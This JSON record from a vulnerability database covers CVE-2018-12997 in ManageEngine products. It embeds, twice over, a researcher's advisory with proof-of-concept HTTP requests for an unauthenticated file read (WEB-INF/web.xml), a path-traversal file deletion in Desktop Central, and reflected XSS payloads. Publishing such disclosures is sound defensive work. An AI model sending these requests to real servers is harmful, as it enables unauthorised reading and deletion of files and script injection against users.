{"id": "E-663", "hash": "08de2e8c9c2dabedf20a5fdcc1d367dc", "type": "dsquare", "bulletinFamily": "exploit", "title": "ManageEngine Multiple Products File Disclosure", "description": "File disclosure vulnerability in ManageEngine Firewall Analyzer, NetFlow Analyzer, Network Configuration Manager, OpManager and OpUtils\n\nVulnerability Type: File Disclosure", "published": "2018-09-18T00:00:00", "modified": "2018-09-18T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Dsquare Security", "references": [], "cvelist": ["CVE-2018-12997"], "lastseen": "2019-05-29T15:31:57", "history": [{"bulletin": {"id": "E-663", "hash": "9c958fb7017ba55432ba05fbe45832ef", "type": "dsquare", "bulletinFamily": "exploit", "title": "ManageEngine Multiple Products File Disclosure", "description": "File disclosure vulnerability in ManageEngine Firewall Analyzer, NetFlow Analyzer, Network Configuration Manager, OpManager and OpUtils\n\nVulnerability Type: File Disclosure", "published": "2018-09-18T00:00:00", "modified": "2018-09-18T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "", "reporter": "Dsquare Security", "references": [], "cvelist": ["CVE-2018-12997"], "lastseen": "2018-11-14T01:43:13", "history": [], "viewCount": 374, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-11-14T01:43:13"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-12997"]}, {"type": "zdt", "idList": ["1337DAY-ID-30757"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}], "modified": "2018-11-14T01:43:13"}}, "objectVersion": "1.4", "sourceData": "For the exploit source code contact DSquare Security sales team."}, "lastseen": "2018-11-14T01:43:13", "differentElements": ["cvss"], "edition": 1}], "viewCount": 376, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2019-05-29T15:31:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-12997"]}, {"type": "zdt", "idList": ["1337DAY-ID-30757"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}], "modified": "2019-05-29T15:31:57", "rev": 2}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceData": "For the exploit source code contact DSquare Security sales team.", "_object_type": "robots.models.dsquare.DsquareBulletin", "_object_types": ["robots.models.dsquare.DsquareBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:19:46", "bulletinFamily": "NVD", "description": "Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring.", "modified": "2018-08-20T11:56:00", "id": "CVE-2018-12997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12997", "published": "2018-06-29T12:29:00", "title": "CVE-2018-12997", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2018-07-23T01:54:10", "bulletinFamily": "exploit", "description": "", "modified": "2018-07-22T00:00:00", "published": "2018-07-22T00:00:00", "id": "PACKETSTORM:148635", "href": "https://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion", "type": "packetstorm", "sourceData": "`This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html \n \n \n========================== \nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability \nAuthor: M3 From DBAppSecurity \nAffected Version: All \n========================== \nProof of Concept: \n========================== \n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script \n \n \nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx \n \n \nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n \n \n \n \n========================== \nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion \nAuthor: M3 From DBAppSecurity \nAffected Products:Desktop Central \n========================== \nProof of Concept: \n========================== \n \n \nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif \n \n \nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory: Zoho manageengine Reflected XSS in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script \n \n \nNotice: This vul can reproduce without login. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148635/zohome-xssfile.txt"}], "zdt": [{"lastseen": "2018-07-23T14:14:14", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-07-23T00:00:00", "published": "2018-07-23T00:00:00", "id": "1337DAY-ID-30757", "href": "https://0day.today/exploit/description/30757", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion Vulnerabilities", "type": "zdt", "sourceData": "This issue has been reported to the vendor who has already published patches for this issue.\r\nhttps://www.manageengine.com/products/applications_manager/issues.html\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Applications Manager Reflected XSS Vulnerability\r\nAuthor: M3 From DBAppSecurity\r\nAffected Version: All\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\r\n\r\n\r\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\r\n\r\n\r\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.\r\n\r\n\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:Desktop Central\r\n==========================\r\nProof of Concept:\r\n==========================\r\n\r\n\r\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\r\n\r\n\r\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Reflected XSS in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script\r\n\r\n\r\nNotice: This vul can reproduce without login.\n\n# 0day.today [2018-07-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30757"}]}